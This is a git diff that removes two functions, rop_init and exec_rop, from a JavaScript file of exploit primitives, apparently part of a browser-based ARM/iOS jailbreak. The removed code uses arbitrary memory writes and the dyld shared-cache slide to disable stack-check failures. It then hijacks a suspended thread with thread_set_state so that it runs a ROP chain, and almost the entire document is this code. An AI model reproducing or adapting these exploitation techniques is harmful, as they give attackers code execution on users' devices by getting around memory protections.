| -rw-r--r-- | src/js/primitives/call.js | 84 |
1 files changed, 0 insertions, 84 deletions
diff --git a/src/js/primitives/call.js b/src/js/primitives/call.js
index 74a20d8..6d4ced6 100644
--- a/src/js/primitives/call.js
+++ b/src/js/primitives/call.js
@@ -330,88 +330,4 @@ function scall() { } return call4arg.apply(this, args_to_pass); } -} - -function rop_init() { - stack_shit_rop = scall("mmap", 0, 0x1000000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANON, -1, 0); -} - -function exec_rop(buf) { - /* - * setup ptrs - */ - write_u32(countptr, count); - write_u32(thptr, th); - write_u32(threadptr, thread); - write_u32(thread_stateptr, thread_state); - - write_u32(countptrptr, countptr); - write_u32(thptrptr, thptr); - write_u32(threadptrptr, threadptr); - write_u32(thread_stateptrptr, thread_stateptr); - - var dyld_shc_slide = get_dyld_shc_slide(); - - /* - * make __stack_chk_fail infinite loop - * (works by setting its lazy addy to its resolver, thus the resolver just - * endlessly jumps to iself) - */ - write_u32(__stack_chk_fail_lazy_addy + dyld_shc_slide, __stack_chk_fail_resolver + dyld_shc_slide); - - if (stack_shit_rop == 0) { - rop_init(); - } - - calls4arg("printf", sptr("%x %x\n"), 0, stack_shit_rop, 0); - - /* - * if the thread doesn't exist, create it. 
- */ - calls4arg("pthread_create", threadptr, 0, __stack_chk_fail_resolver + dyld_shc_slide, 0); - thread = read_u32(threadptr); - write_u32(th, calls4arg("pthread_mach_thread_np", thread, 0, 0, 0)); - rth = read_u32(th); - calls4arg("thread_suspend", rth, 0, 0, 0); - - if (pthread_ret == 0) { - pthread_ret = malloc(4); - } - - write_u32_buf(stack_shit_rop + 0x3c, buf, buf.length * 4); - - /* - - var stack_shit_ret_offset = 0x58; - - write_u32(stack_shit + stack_shit_ret_offset, pthread_exit + dyld_shc_slide); - */ - - /* - * stack - */ - write_u32(thread_state + (13 << 2), stack_shit_rop); - - /* - * pc - */ - write_u32(thread_state + (15 << 2), add_sp_0x3c + dyld_shc_slide); - - /* - * cpsr, magic - */ - write_u32(thread_state + (16 << 2), 0x40000020); - - printf("actually doing it\n"); - - /* - * set the state - */ - calls4arg("thread_set_state", rth, ARM_THREAD_STATE, thread_state, ARM_THREAD_STATE_COUNT); - calls4arg("thread_resume", rth, 0, 0, 0); - - calls4arg("pthread_join", thread, pthread_ret, 0, 0); - write_u32(count, 17); - calls4arg("thread_get_state", rth, ARM_THREAD_STATE, thread_state, count); - return read_u32(pthread_ret); }
\ No newline at end of file |
